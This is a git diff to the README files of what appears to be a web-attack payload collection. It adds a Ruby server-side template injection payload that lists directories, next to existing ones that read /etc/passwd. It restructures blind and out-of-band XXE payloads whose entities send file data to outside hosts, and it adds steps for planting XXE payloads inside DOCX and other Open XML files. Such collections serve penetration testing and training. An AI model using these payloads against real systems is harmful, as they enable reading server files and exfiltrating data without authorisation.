diff --git a/Server Side Template injections/README.md b/Server Side Template injections/README.md
index 7a43ed5..153b320 100644
--- a/Server Side Template injections/README.md	
+++ b/Server Side Template injections/README.md	
@@ -15,16 +15,22 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment
 
 ### Basic injection
 
-```python
+```ruby
 <%= 7 * 7 %>
 ```
 
 ### Retrieve /etc/passwd
 
-```python
+```ruby
 <%= File.open('/etc/passwd').read %>
 ```
 
+### List files and directories
+
+```ruby
+<%= Dir.entries('/') %>
+```
+
 ## Java
 
 ### Java - Basic injection
@@ -228,4 +234,5 @@ $eval('1+1')
 * [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98)
 * [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
 * [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/12/02/VelocityServlet-Expression-language-Injection/)
-* [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti)
\ No newline at end of file
+* [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti)
+* [RITSEC CTF 2018 WriteUp (Web) - Aj Dumanhug](https://medium.com/@ajdumanhug/ritsec-ctf-2018-writeup-web-72a0e5aa01ad)
\ No newline at end of file
diff --git a/XXE injection/README.md b/XXE injection/README.md
index a1cb8c3..8079471 100644
--- a/XXE injection/README.md	
+++ b/XXE injection/README.md	
@@ -101,9 +101,9 @@ h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
 i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
 ```
 
-## Blind XXE
+## Blind XXE - Out of Band
 
-Blind XXE
+### Blind XXE
 
 ```xml
 <?xml version="1.0" encoding="ISO-8859-1"?>
@@ -116,7 +116,7 @@ Blind XXE
 <foo>&callhome;</foo>
 ```
 
-XXE OOB Attack (Yunusov, 2013)
+### XXE OOB Attack (Yunusov, 2013)
 
 ```xml
 <?xml version="1.0" encoding="utf-8"?>
@@ -129,7 +129,7 @@ File stored on http://publicServer.com/parameterEntity_oob.dtd
 %all;
 ```
 
-XXE OOB with DTD and PHP filter
+### XXE OOB with DTD and PHP filter
 
 ```xml
 <?xml version="1.0" ?>
@@ -146,15 +146,42 @@ File stored on http://127.0.0.1/dtd.xml
 <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">
 ```
 
-XXE Inside SOAP
+### XXE Inside SOAP
 
 ```xml
 <soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
 ```
 
+### XXE Inside DOCX file
+
+Format of an Open XML file (inject the payload in any .xml file):
+
+- /_rels/.rels
+- [Content_Types].xml
+- Default Main Document Part
+  - /word/document.xml
+  - /ppt/presentation.xml
+  - /xl/workbook.xml
+
+Then update the file `zip -u xxe.docx [Content_Types].xml`
+
+Tool : https://github.com/BuffaloWill/oxml_xxe
+
+```xml
+DOCX/XLSX/PPTX
+ODT/ODG/ODP/ODS
+SVG
+XML
+PDF (experimental)
+JPG (experimental)
+GIF (experimental)
+```
+
 ## Thanks to
 
 * [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing)
 * [Detecting and exploiting XXE in SAML Interfaces - Von Christian Mainka](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html)
 * [staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4)
 * [mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870)
+* [Exploiting xxe in file upload functionality - BLACKHAT WEBCAST- 11/19/15 Will Vandevanter - @_will_is_](https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf)
+* [XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer)](http://en.hackdig.com/08/28075.htm)
\ No newline at end of file